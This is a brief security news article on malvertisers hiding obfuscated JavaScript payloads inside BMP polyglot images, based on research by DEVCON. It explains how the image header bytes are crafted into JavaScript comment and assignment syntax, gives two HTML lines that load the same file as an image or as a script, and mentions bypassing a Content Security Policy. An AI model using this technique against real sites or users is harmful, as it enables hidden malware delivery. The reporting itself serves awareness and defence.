Attackers are using polyglot images in malvertising attacks to hide their malicious payloads

• Researchers from DEVCON have observed a group of malvertisers using polyglot images to hide malicious ad payloads.
• Polyglot images can be both an image and JavaScript at the same time. Also, polyglot images do not require an external script to extract the payload.

Researchers from DEVCON have observed a group of malvertisers using polyglot images to hide malicious ad payloads.

Why it matters - We have been familiar with attackers using steganography technique to hide malicious payloads inside images. However, Polyglot images are different from Steganographic images.

Worth noting

• Steganography hides malware in an image by altering a few pixels in the image which makes it difficult to detect.
• Polyglot, on the other hand, is unique as the polyglot images can be an image and JavaScript at the same time.
• Additionally, polyglot images do not require an external script to extract the payload.

The big picture - Attackers use BMP (.bmp) images in the malvertising campaigns and manipulate the size of the image bytes and hexadecimal characters to trick the computer to believe it as something else.

Researchers analyzed a sample and detected that the attackers have changed the size of the image bytes so that they appear to be the character codes for /**. Researchers noted that this combination of characters creates JavaScript comments and are used to make the JavaScript Interpreter ignore everything in-between these characters (/* ignore me */).

“As expected the JavaScript Comment is terminated with */. The attacker then adds the characters = and `. What the attacker has done here is turned the file type BMP into a JavaScript variable and set it to another heavily obfuscated payload,” researchers noted.

The BMP file can now be run in the browser in two different ways.

• <img src="polyglot.jpg"/> will display an image to the user and ignores the JavaScript.
• <script src="polyglot.jpg"></script> will execute valid JavaScript and ignores the image.

The bottom line - Such techniques are not new to security researchers to execute shellcode and deploy server-side attacks.

Similar JS/GIF polyglot images are a known technique to bypass a server's Content Security Policy to execute XSS attacks. This implies that more threat actors are now moving into the ad fraud environment with such techniques to exploit the users.